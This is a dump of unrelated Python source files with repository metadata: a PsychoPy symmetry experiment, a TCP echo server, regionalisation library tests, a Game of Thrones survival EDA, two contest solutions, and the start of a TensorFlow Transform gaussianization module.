respCorr = 0 # this stops the participants hacking through by pressing both a and l at the same time
responseScreen.setPos([0, -upshift/2])
responseScreen.draw()
responseScreen.setPos([0, upshift/2])
responseScreen.draw()
myWin.flip()
responseKey = event.waitKeys(keyList=['a', 'l', 'escape'])[0]
# responseKey = 'a' # debug
if responseKey == 'escape':
core.quit()
if screen == 'l':
if responseKey == 'a':
if trialType == 'asym':
respCorr = 0
else:
respCorr = 1
elif responseKey == 'l':
if trialType == 'asym':
respCorr = 1
else:
respCorr = 0
elif screen == 'r':
if responseKey == 'l':
if trialType == 'asym':
respCorr = 0
else:
respCorr = 1
elif responseKey == 'a':
if trialType == 'asym':
respCorr = 1
else:
respCorr = 0
if practiceExp == 'practice':
if respCorr == 0:
s1 = sound.Sound(200,secs=0.3,sampleRate=44100)
s1.play()
core.wait(punishmentSoundDuration)
return respCorr, responseKey
# This long loop runs through the trials
def mainLoop(trialbook, reps, practiceExp): # define Reps and set at bottom how many blocks you want
blockDuration = 20
nBlocksToGo = 24
trialCounter = 0
trials=data.TrialHandler(nReps=reps, method='random', trialList=data.importConditions(trialbook))
trials.extraInfo = expInfo
thisTrial=trials.trialList[0]
for thisTrial in trials:
if thisTrial!=None:
for paramName in thisTrial.keys():
exec('{} = thisTrial[paramName]'.format(paramName), locals(), globals())
cond = figureground #+ str(plane)
nV = 32 #number of Vertices
if symmetry == 'sym':
v = makePattern(0, 0, 'circle', nV, 100, 2)
elif symmetry == 'asym':
v = makePattern(0, 0, 'circle', nV, 100, 0) #if axes more than 0 is showing only symmetrical
else:
print('error')
if trialCounter == blockDuration and practiceExp=='exp':
nBlocksToGo = nBlocksToGo - 1
message('Break',nBlocksToGo = nBlocksToGo)
event.waitKeys(keyList=['g'])
trialCounter = 0
trialCounter = trialCounter + 1
if screen == 'l':
responseScreen.setText("Symmetry Asymmetry")
elif screen == 'r':
responseScreen.setText("Asymmetry Symmetry")
myTexture0 = numpy.random.randint(0,2,(128,128))-0.2
rdp0.tex = myTexture0
myTexture1 = numpy.random.randint(0,2,(128,128))-0.2
rdp1.tex = myTexture1
verticesP = [(-30,256),(-30, -256),(30,- 256),(30,256),(256, 256), (256, 196), (196, 196),
(196, 256),(-256, 256), (-256, 196), (-196, 196), (-196, 256)]
stencilP = visual.Aperture(myWin, units="pix", shape= verticesP, size = 1)
fixation.setRadius(8)
drawStim(stencilP, cond)
myWin.flip()
t = myClock.getTime() + 1.5 # fixation for this much time
while myClock.getTime() < t:
pass #do nothing
#
v[0][0] = -30
v[31][0] = 30
v[15][0] = -30
v[16][0] = 30
topL = [v[0][0],256]
topR = [v[31][0],256]
bottomL = [v[15][0],-256]
bottomR = [v[16][0],-256]
v.insert(0, topR)
v.insert(1, topL)
v.insert(18, bottomL)
v.insert(19, bottomR)
v.append([30, 256])
v.append([256, 256])
v.append([256, 196])
v.append([196, 196])
v.append([196, 256])
v.append([-256, 256])
v.append([-256, 196])
v.append([-196, 196])
v.append([-196, 256])
v.append([-256, 256])
stencil = visual.Aperture(myWin, units="pix", shape= v)
stencil.enabled = False
#generating 50% random dots
for x in range(128):
for y in range(128):
if random.randint(0,1):
myTexture0[x][y] = random.randint(0,1) -0.2
else:
myTexture0[x][y] = rdp0.tex[x][y]
rdp0.tex = myTexture0
for x in range(128):
for y in range(128):
if random.randint(0,1):
myTexture1[x][y] = random.randint(0,1) -0.2
else:
myTexture1[x][y] = rdp1.tex[x][y]
rdp1.tex = myTexture1
# this is the stimulus
fixation.setRadius(16)
drawStim(stencil, cond)
myWin.flip()
t = myClock.getTime() + 1.5
# tr= str(trigger)
# ser.write(tr.encode('raw_unicode_escape')) #this converts the str(trigger) into a UTF byte #ISO-8859-1
# ser.write(bytes(str(trigger)))
# print (tr, tr.encode('raw_unicode_escape'))
# core.wait(0.01)
# #ser.write(b'0')
# ser.write(chr(trigger).encode())
# ser.write(chr(triggers[reps]))
# core.wait(0.01)
# ser.write(chr(0))
# fixation for this much time
while myClock.getTime() < t:
pass #do nothing
myWin.flip()
if event.getKeys(["escape"]):
core.quit()
# responseScreen.setPos([0, -upshift/2])
# responseScreen.draw()
# responseScreen.setPos([0, upshift/2])
# responseScreen.draw()
# myWin.flip()
# w = myClock.getTime() + baselineDuration
#
# responseKey = event.waitKeys(keyList=['a', 'l', 'escape'])[0]
# while myClock.getTime() < w:
# if event.getKeys (['escape']):
# core.quit()
# event.clearEvents()
# myWin.close
# if responseKey == 'escape':
#a core.quit()
respCorr, choice = responseCollect(symmetry, screen, practiceExp)
# if symmetry == 'sym':
# if responseKey == 'a':
# respCorr = 1
# myWin.flip()
# elif responseKey == 'l':
# respCorr = 0
# s1 = sound.Sound(200,secs=0.3,sampleRate=44100)
# if block == "practice": s1.play()
# myWin.flip()
# elif symmetry == 'asym':
# if responseKey =='l':
# respCorr = 1
# myWin.flip()
# elif responseKey == 'a':
# respCorr = 0
# s1 = sound.Sound(200,secs=0.3,sampleRate=44100)
# if block == "practice": s1.play()
# myWin.flip()
trials.addData('respCorr', respCorr)
trials.addData('choice', choice)
#trials.addData('RT',RT)
trials.saveAsExcel(filename+'.xlsx', sheetName= 'data', dataOut=['all_raw'])
trials.saveAsWideText(filename+'.txt')
message('HelloPractice')
event.waitKeys(keyList = ['g'])
mainLoop('bookPreview.xlsx', 2, "practice") #32 practice trials
message('HelloMain')
event.waitKeys(keyList = ['g'])
mainLoop('bookPreview.xlsx', 30, "exp") #30 x 16 = 480 trials
message('Goodbye')
core.wait(2)
ser.close()
myWin.close()
core.quit()
| [
"[email protected]"
]
| |
db1fb4aa9d6bf0b1533d816eb6bf74d058a13110 | c4c9ba3dbde9a318204e49a77de38a07d2961a8b | /simpleserver.py | cac0fa3df5788b2e520c2599a72b5f991ac5f9ed | []
| no_license | kkingsbe/RealMultiplayer | 9db5b1ddd4f718ce68f889cc725755974f9e1dcf | e6c3540dfa214612ae1c73e208acd1c7858f0a48 | refs/heads/master | 2020-04-22T13:47:25.468029 | 2019-02-13T02:03:36 | 2019-02-13T02:03:36 | 170,421,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | import socket
TCP_IP = socket.gethostname()
TCP_PORT = 5005
BUFFER_SIZE = 20 # Normally 1024, but we want fast response
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
conn1, addr = s.accept()
conn2, addr2 = s.accept()
print('Connection address:', addr)
print('Connection2 address:', addr2)
while 1:
data = conn1.recv(BUFFER_SIZE)
if not data: break
print("received data:", data)
conn2.send(data) # echo
conn1.close()
conn2.close() | [
"[email protected]"
]
| |
b60ad7df385f84596c6a0c1000ac89426cc71844 | ad0e939dd2ed5c772b19658eecd90954c33eeb22 | /region/p_regions/tests/test_azp_simulated_annealing.py | d09fddd2b727678e86800bb58457e3edfd671ecb | [
"BSD-3-Clause"
]
| permissive | yogabonito/region | b0697cf150fe6cd7986fb0281686c50626bad090 | 725e7e1f8cd01e5bb175803e3649d019a0e4f443 | refs/heads/master | 2021-01-21T15:23:03.717624 | 2018-04-04T14:05:43 | 2018-04-04T14:05:43 | 95,353,704 | 0 | 0 | null | 2017-06-25T10:45:16 | 2017-06-25T10:45:16 | null | UTF-8 | Python | false | false | 5,993 | py | import networkx as nx
from region.p_regions.azp import AZPSimulatedAnnealing
from region.tests.util import region_list_from_array, compare_region_lists
from region.util import dataframe_to_dict
from .data import adj, neighbors_dict, gdf, graph, w, \
attr, attr_dict, attr_str, double_attr_str, \
double_attr, double_attr_dict, \
optimal_clustering
# ### TESTS WITH SCALAR attr ##################################################
# test with csr_matrix
def test_scipy_sparse_matrix():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame as areas argument
def test_geodataframe():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_geodataframe(gdf, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with a dict as areas argument
def test_dict():
value_dict = dataframe_to_dict(gdf, attr_str)
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_dict(neighbors_dict, value_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_basic():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_basic():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_basic():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_w(w, attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ### TESTS WITH NON-SCALAR attr AND spatially_extensive_attr #################
# test with csr_matrix
def test_scipy_sparse_matrix_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, double_attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame
def test_geodataframe_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_geodataframe(gdf, double_attr_str, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a dict as areas argument
def test_dict_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_dict(neighbors_dict, double_attr_dict, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_multi_attr():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_w(w, double_attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
| [
"[email protected]"
]
| |
663eb729df9fd31227930e3361b2418b2f4d6d5c | 89cb1736c052c6ecd4028a57d23a92252427bce4 | /game_of_thrones_EDA.py | bb0faf9ce6d8c23cb057a8f8ad5be870eb543f44 | []
| no_license | lucascmbarros/game_of_thrones_dataset | 889c1b4c8e0edba280dac459896390ef2ad94891 | a8febe918998e490502fa5903904c2583c37f829 | refs/heads/master | 2020-05-04T06:25:48.268120 | 2019-04-08T01:25:50 | 2019-04-08T01:25:50 | 179,005,703 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,128 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 20 16:26:49 2019
@author: lucas.barros
Assignment 2: Game of Thrones predictions
"""
#################################
# Basic libraries
#################################
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
#################################
# Importing file
#################################
file = 'GOT_character_predictions.xlsx'
df = pd.read_excel(file)
##############################################################################
# EDA
##############################################################################
# showing all columns when called
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', None)
print(df.columns)
'''
Some column names are not clear on what they are or too complicated to type
everytime it is needed; I'm renaming some for covinience
'''
df = df.rename(index = str, columns ={'S.No': 'charnumber',
'dateOfBirth': 'DOB',
'book1_A_Game_Of_Thrones': 'book1',
'book2_A_Clash_Of_Kings': 'book2',
'book3_A_Storm_Of_Swords': 'book3',
'book4_A_Feast_For_Crows': 'book4',
'book5_A_Dance_with_Dragons': 'book5'
})
print(df.info())
print(df.describe().round(2))
'''
The only variables that seem to be continuous are age, DOB, numDeadRelations,
popularity, the others are categorical/binary.
'''
df['isAlive'].describe()
df['isAlive'].value_counts()
#################################
# Flagging missing values
#################################
mv_bycolumn = df.isnull().sum()
print(mv_bycolumn)
#########################################################
# Creating new columns for the flagged missing values
#########################################################
'''
Creating columns for the missing values with 0 and 1s
'''
for col in df:
if df[col].isnull().any():
df['m_'+col] = df[col].isnull().astype(int)
df_dropped = df.dropna()
####################################
# Analysing the culture variable
####################################
df.culture.head()
# getting dummy variables for the cultures
dum_cult = pd.get_dummies(df[['culture']], dummy_na = True)
# analyzing the count of cultures
for col in dum_cult.iloc[:, :65]:
count = dum_cult[col].value_counts()
print(count)
'''
Westermen are decendent of Andals (have similar echnicity),
but since the lineage come from several generations on the past,
It is better to separete them.
'''
# filling NAs with unknown
fill = 'unknown'
df['culture'] = df['culture'].fillna(fill)
# Some culture have duplicates, aggregating them together
df['culture'][df['culture'].str.contains('Andal')] = 'Andal'
df['culture'][df['culture'].str.contains('Asshai')] = 'Asshai'
df['culture'][df['culture'].str.contains('Astapor')] = 'Astapor'
df['culture'][df['culture'].str.contains('Braavos')] = 'Braavos'
df['culture'][df['culture'].str.contains('Dorn')] = 'Dorne'
df['culture'][df['culture'].str.contains('Ghiscari')] = 'Ghiscari'
df['culture'][df['culture'].str.contains('Iron')] = 'Ironborn'
df['culture'][df['culture'].str.contains('iron')] = 'Ironborn'
df['culture'][df['culture'].str.contains('Lhazare')] = 'Lhazareen'
df['culture'][df['culture'].str.contains('Lyse')] = 'Lysene'
df['culture'][df['culture'].str.contains('Meereen')] = 'Meereen'
df['culture'][df['culture'].str.contains('orthmen')] = 'Northmen'
df['culture'][df['culture'].str.contains('Norvos')] = 'Norvos'
df['culture'][df['culture'].str.contains('Qarth')] = 'Qarth'
df['culture'][df['culture'].str.contains('Reach')] = 'Reach'
df['culture'][df['culture'].str.contains('River')] = 'Rivermen'
df['culture'][df['culture'].str.contains('Stormland')] = 'Stormland'
df['culture'][df['culture'].str.contains('Summer')] = 'Summer'
df['culture'][df['culture'].str.contains('Vale')] = 'Vale'
df['culture'][df['culture'].str.contains('Lyse')] = 'Lysene'
df['culture'][df['culture'].str.contains('ester')] = 'Westernmen'
'''
Free folks and windlings are actually the same people, just different
nomenclature.
'''
df['culture'][df['culture'].str.contains('Wilding')]= 'Windling'
df['culture'][df['culture'].str.contains('Free')]= 'Windling'
df['culture'][df['culture'].str.contains('free')]= 'Windling'
print(df['culture'][df['isAlive'] == 0].value_counts())
print(df['culture'][df['isAlive'] == 1].value_counts())
'''
Generally speaking, the inhabitants of the north of Westeros are the ones
that die the most. There is probably due to the number of wars in that region
plus what happens in the Great Wall.
'''
####################################
# Analysing the house variable
####################################
df.house.head()
# getting dummy variables for the cultures
dum_hou = pd.get_dummies(df[['house']], dummy_na = True)
#### analyzing the count of cultures
for col in dum_hou.iloc[:, :348]:
count = dum_hou[col].value_counts()
print(count)
# Filling NAs with unknown
fill = 'unknown'
df['house'] = df['house'].fillna(fill)
#### Some houses have duplicates, aggregating them together
df['house'][df['house'].str.contains('Lannister')] = 'Lannister'
df['house'][df['house'].str.contains('Baratheon')] = 'Baratheon'
df['house'][df['house'].str.contains('Brotherhood')] = 'Brotherhood without banners'
df['house'][df['house'].str.contains('Bolton')] = 'Bolton'
df['house'][df['house'].str.contains('Flint')] = 'Flint'
df['house'][df['house'].str.contains('Brune')] = 'Brune of Browhollow'
df['house'][df['house'].str.contains('Fossoway')] = 'Fossoway'
df['house'][df['house'].str.contains('Frey')] = 'Frey'
df['house'][df['house'].str.contains('Goodbrother')] = 'Goodbrother'
df['house'][df['house'].str.contains('House Harlaw')] = 'House Harlaw'
df['house'][df['house'].str.contains('Kenning')] = 'Kenning'
df['house'][df['house'].str.contains('Royce')] = 'Royce'
df['house'][df['house'].str.contains('Tyrell')] = 'Tyrell'
df['house'].value_counts()
print(df['house'][df['isAlive'] == 0].value_counts())
print(df['house'][df['isAlive'] == 1].value_counts())
'''
Night's Watch die the most, followed by obviously the Targaryen, and then
Starks, Lannisters, Greyjoys, and Freys probably due to the war between the
families.
'''
'''
According to my research, the most important families are Baratheon, Stark,
Lannister, Arryn, Tyrell, Tully, Greyjoy, Martell, and Targaryen.
After the Red Wedding, House Frey became one of the most important.
'''
##################################
# Analysing Title
##################################
print(df.title.value_counts().head(10))
print(df.title[df['isAlive'] == 1].value_counts().head(10))
df.title.isna().sum()
# filling NAs with unknown
fill = 'unknown'
df['title'] = df['title'].fillna(fill)
dum_title = pd.get_dummies(df[['title']], dummy_na = True)
df = pd.concat([df, dum_title], axis = 1)
'''
Higher titles of nobility seems to have a higher chance of surviving.
'''
##################################################
# Analysing Father, Mother, Heir, and Spouse
##################################################
# flagging missing values
print(df.father.isna().sum())
print(df.mother.isna().sum())
print(df.heir.isna().sum())
print(df.spouse.isna().sum())
# checking the distribution
print(df.father.value_counts())
print(df.mother.value_counts())
print(df.heir.value_counts())
# filling NAs with unknown
fill = 'unknown'
df['father'] = df['father'].fillna(fill)
df['mother'] = df['mother'].fillna(fill)
df['heir'] = df['heir'].fillna(fill)
df['spouse'] = df['spouse'].fillna(fill)
###################################################
# Analysing books
##################################################
# Flagging Missing Values
print(df.book1.isna().sum())
print(df.book2.isna().sum())
print(df.book3.isna().sum())
print(df.book4.isna().sum())
print(df.book5.isna().sum())
'''
no NAs
'''
print(df.book1.value_counts())
print(df.book2.value_counts())
print(df.book3.value_counts())
print(df.book4.value_counts())
print(df.book5.value_counts())
# Studying the relation between being in a book and being alive
'''There are not a lot of people alive in book1 since it tells a lot of
stories about what happened in the past.
'''
# Checking who appeared in all books, they are probably very significant.
df['all_books'] = (df['book1'] + df['book2'] + df['book3'] + df['book4'] +
df['book5'])
df['all_books'].value_counts()
# Doing a outlier for people who appeared in all books.
df['out_allbooks'] = 0
df['out_allbooks'] = df['all_books'][df['all_books'] == 5]
fill = 0
df['out_allbooks'] = df['out_allbooks'].fillna(fill)
# Flagging characters that didn't appear in any book.
df['no_books'] = 0
df.loc[ : , 'no_books'][df.loc[ : , 'all_books'] == 0] = 1
'''
Combining who appeared in different books might be significant to the
final analysis
'''
df['book_4_5'] = 0
df['book_4_5'] = df['book4'] + df['book5']
df['book_4_5'][df['isAlive']== 1].value_counts()
df['book_1_5'] = 0
df['book_1_5'] = df['book1'] + df['book5']
df['book_1_5'][df['isAlive']== 1].value_counts()
df['book_3_n_5'] = 0
df['book_3_n_5'] = df['book3'] + df['book5']
df['book_3_n_5'][df['isAlive']== 1].value_counts()
df['book_2_3'] = 0
df['book_2_3'] = df['book2'] + df['book3']
df['book_2_3'][df['isAlive']== 1].value_counts()
df['book_2_3'] = 0
df['book_2_3'] = df['book2'] + df['book3']
df['book_2_3'][df['isAlive']== 1].value_counts()
df['book_3_4_5'] = 0
df['book_3_4_5'] = df['book4'] + df['book5'] + df['book3']
df['book_3_4_5'][df['isAlive']== 1].value_counts()
'''
These combinations above shows who appeared in/or the selected books.
'''
print(np.corrcoef(x=df['isAlive'], y = df['book1']))
print(np.corrcoef(x=df['isAlive'], y = df['book2']))
print(np.corrcoef(x=df['isAlive'], y = df['book3']))
print(np.corrcoef(x=df['isAlive'], y = df['book4']))
print(np.corrcoef(x=df['isAlive'], y = df['book5']))
print(np.corrcoef(x=df['isAlive'], y = df['all_books']))
'''
The is a small correlation between being alive and the older the book,
although book4 has the highest correlation with being alive. Also the more the
person appeared the highest the probability of being alive.
'''
#################################################################
# Analysing If Mother, Father, Heir, and/or Spouse are alive
#################################################################
# Flagging missing Values
print(df.isAliveMother.isna().sum())
print(df.isAliveFather.isna().sum())
print(df.isAliveHeir.isna().sum())
print(df.isAliveSpouse.isna().sum())
'''
There are a lot of missing values, I'm assuming that if it is unknown that
their family is alive, the character is probably not important, hence I'm
inputing missing values with 0.
'''
# Filling NAs with unknown
fill = 0
df.isAliveMother = df.isAliveMother.fillna(fill)
df.isAliveFather = df.isAliveFather.fillna(fill)
df.isAliveHeir = df.isAliveHeir.fillna(fill)
df.isAliveSpouse = df.isAliveSpouse.fillna(fill)
###################################################
# Analysing if is Married and/or is Noble
###################################################
# Flagging missing Values
print(df.isMarried.isna().sum())
print(df.isNoble.isna().sum())
'''
No missing values
'''
# Checking the distribution of Married and Spouse
print(df.isMarried.value_counts())
print(df.isNoble.value_counts())
print(df['isMarried'][df['isAlive'] == 1].sum())
print(df['isNoble'][df['isAlive'] == 1].sum())
'''
69.2% of Married are alive
72.5% of Nobles are alive
'''
df['isMarried'][df['isMarried'] == 1 ][df['isNoble'] == 1][df['isAlive'] == 1].sum()
'''
183 are Married and are Noble
109 are Married, Noble, and are Alive
'''
'''
Creating a column for characters that are noble and married
'''
df['lucky'] = 0
df['lucky'] = df.loc[ : ,'isNoble'] + df.loc[: , 'isMarried']
df['lucky'] = df['lucky'].replace(1, 0)
df['lucky'] = df['lucky'].replace(2, 1)
#############################################################
# Analysing Age
#############################################################
# Flagging missing values for AGE
print(df.age.isna().sum())
'''
Droping the 2 extreme outliers
'''
df = df.drop(df.index[110])
df = df.drop(df.index[1349])
df.age.describe()
'''
Getting the age of the person, if he/she is alive and adding with the DOB it
will give us the current year of the dataset(which is 305). Also if we get the
oldest person alive and he his/hers DOB, we can assume that anyone that was
born before that is dead. The oldest person alive was born in 208, so that
will be a threshold.
'''
'''
Creating a column with dummy 1 and 0 to if they are living the interval
between 208 and 305.
'''
df['300year_vs_dob'] = 305 - df['DOB']
df['alive_by_age'] = 0
def conditions(df):
if (df['age'] == df['300year_vs_dob']):
return 0
elif (df['age'] < df['300year_vs_dob']):
return 1
df['alive_by_age'] = df.apply(conditions, axis=1)
print(df['alive_by_age'].sum())
# Filling the missing values with -1
df['300year_vs_dob'] = df['300year_vs_dob'].fillna(-1)
# Filling the missing value with -1 to
fill = -1
df.alive_by_age = df.alive_by_age.fillna(fill)
# Filing the NA's with -1 to analyze the distribution afterwards
fill = -1
df['age'] = df['age'].fillna(fill)
# Creating a new colum without the Nas values of the age
df['out_age'] = df['age'][df['age'] != -1]
df['out_age'] = df['out_age'].fillna(0)
# Analysing the distribution of the ages
df_age = df.age.dropna()
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df_age)
plt.show()
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df.age)
plt.show()
# Filling NAs with the median
df['age'][df['age'] == -1] = 27
# Filling the NAs with the median to analyse the distribution afterwards
fill = -1
df['DOB'] = df['DOB'].fillna(fill)
# Creating a new colum without the NA values of the DOB
df['out_DOB'] = df['DOB'][df['DOB'] != -1]
df['out_DOB'] = df['out_DOB'].fillna(0)
df.DOB.describe()
df_DOB = df.DOB.dropna()
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df_DOB)
plt.show()
# filling NAs with the median
df['DOB'][df['DOB'] == -1] = 268
'''
Creating a new column with the sum of age and DOB, if the result != 305 then
the character is not alive.
'''
df['out_year'] = df.DOB + df.age
##########################################################
# Analysing Number of dead relatives and popularity
##########################################################
# Flagging Missing Values
print(df.numDeadRelations.isna().sum())
print(df.popularity.isna().sum())
# distribution of dead relatives
print(df.numDeadRelations.value_counts())
# checking the correlation between dead relatives and being alive
np.corrcoef(x = df['numDeadRelations'] , y = df['isAlive'])
'''
It shows a very weak negative correlation between the number of dead relatives
and being alive
I'm creating a dummy variable for the number of read relatives, where if the
character has 0 dead relatives, it will flag as 1.
'''
dead_relations_zero = 0
df['out_deadrelations'] = 0
df.loc[ : , 'out_deadrelations'][df.loc[ : , 'numDeadRelations'] !=
dead_relations_zero] = 1
# Exploring the popularity
print(df.popularity.describe())
# Analysing the distribution
fig, ax = plt.subplots(figsize=(20,10))
sns.distplot(df['popularity'])
plt.show()
sns.lmplot(x = 'popularity',
y = 'isAlive',
data = df
)
plt.show()
# Checking the correlation with being alive
np.corrcoef(x = df['popularity'], y = df['isAlive'])
'''
I'm going to create a new column only with the most popular characters.
Checking the distribution of according to the quantiles.
'''
df['popularity'].quantile([0.25,
0.50,
0.75,
0.80,
0.90,
0.95
])
df_popularity = (df.loc[ : , ['name',
'house',
'popularity',
'isAlive']]
[df['popularity'] >= 0.3]
)
print(df_popularity.describe())
print(np.corrcoef(x=df_popularity['popularity'],
y = df_popularity['isAlive']
))
# Creating a new column only with characters >= 0.3 of popularity.
df['out_popular'] = 0
df['out_popular'][df['popularity'] >= 0.3] = 1
df_corr = df.loc[:, ['out_age', 'out_DOB', 'out_year', 'alive_by_age']
].corr().round(2)
###############################################################################
# Dataset is ready for the models
###############################################################################
df.to_excel('got.xlsx')
| [
"[email protected]"
]
| |
23c0dd25543411644e979a4ed4368b85c6f49098 | 4dbaea97b6b6ba4f94f8996b60734888b163f69a | /LeetCode/8.py | 15f59ed2df0e448995c3a574ba4fa386c04f4725 | []
| no_license | Ph0en1xGSeek/ACM | 099954dedfccd6e87767acb5d39780d04932fc63 | b6730843ab0455ac72b857c0dff1094df0ae40f5 | refs/heads/master | 2022-10-25T09:15:41.614817 | 2022-10-04T12:17:11 | 2022-10-04T12:17:11 | 63,936,497 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | class Solution(object):
def myAtoi(self, str):
"""
:type str: str
:rtype: int
"""
import re
minus = 1
if len(str) == 0:
return 0
str = str.strip()
i = 0
while i < len(str):
if i == 0 and (str[i] == '-' or str[i] == '+') and minus == 1:
minus = -1
elif str[i] not in ['0','1','2','3','4','5','6','7','8','9']:
break
i += 1
if i == 0 or (i == 1 and minus == -1):
return 0
res = int(str[0:i])
res = min(res, 2147483647)
res = max(res, -2147483648)
return res | [
"[email protected]"
]
| |
1f29a592c39022e79242a176b8638f31728d0fba | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_207/190.py | 4ea85e66ef60f663dfa02f1f700dbd13bd15454c | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,505 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from heapq import *
def read_ints():
return list(map(int, input().split()))
def solve(t):
N, r, o, y, g, b, v = read_ints()
if r == g != 0:
if o or y or b or v:
print('Case #{}: IMPOSSIBLE'.format(t))
else:
print('Case #{}: {}'.format(t, 'RG'*r))
return
if y == v != 0:
if r or o or g or b:
print('Case #{}: IMPOSSIBLE'.format(t))
else:
print('Case #{}: {}'.format(t, 'VY'*y))
return
if b == o != 0:
if r or y or g or v:
print('Case #{}: IMPOSSIBLE'.format(t))
else:
print('Case #{}: {}'.format(t, 'OB'*b))
return
r -= g
y -= v
b -= o
if r < 0 or y < 0 or b < 0:
print('Case #{}: IMPOSSIBLE'.format(t))
return
M = max(r, y, b)
h = [(-r, r != M, 'R'), (-y, y != M, 'Y'), (-b, b != M, 'B')]
heapify(h)
res = ''
count, _prio, ch = heappop(h)
while count < 0:
res += ch
count, _prio, ch = heapreplace(h, (count + 1, _prio, ch))
if res[-1] != res[0] and all(count == 0 for count, *_ in h):
res = res.replace('R', 'RG'*g + 'R', 1)
res = res.replace('Y', 'YV'*v + 'Y', 1)
res = res.replace('B', 'BO'*o + 'B', 1)
print('Case #{}: {}'.format(t, res))
else:
print('Case #{}: IMPOSSIBLE'.format(t))
if __name__ == "__main__":
for t in range(1, int(input())+1):
solve(t)
| [
"[email protected]"
]
| |
6f93021be2e728eb052b23276ba667565f0f0bb7 | 872ea32f551c803ac497a38667dc272965246561 | /tensorflow_transform/gaussianization.py | 320acb6f67fcda13b616b72cb43fb36c878774ab | [
"Apache-2.0"
]
| permissive | tensorflow/transform | 5c4d74c15e7a13ef0901816dfe35b0901d6cb1da | d2bfc2640137324dcad7f7be365e6c851c01f4e9 | refs/heads/master | 2023-08-31T21:54:54.222760 | 2023-08-15T22:45:45 | 2023-08-15T22:46:20 | 81,509,390 | 1,030 | 267 | Apache-2.0 | 2023-08-11T22:57:56 | 2017-02-10T00:36:53 | Python | UTF-8 | Python | false | false | 13,792 | py | # Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities used to compute parameters for gaussianization."""
import numpy as np
import tensorflow as tf
# The expressions to compute the first L-moments from the parameters of the
# Tukey HH distribution are taken from:
# Todd C. Headrick, and Mohan D. Pant. "Characterizing Tukey h and
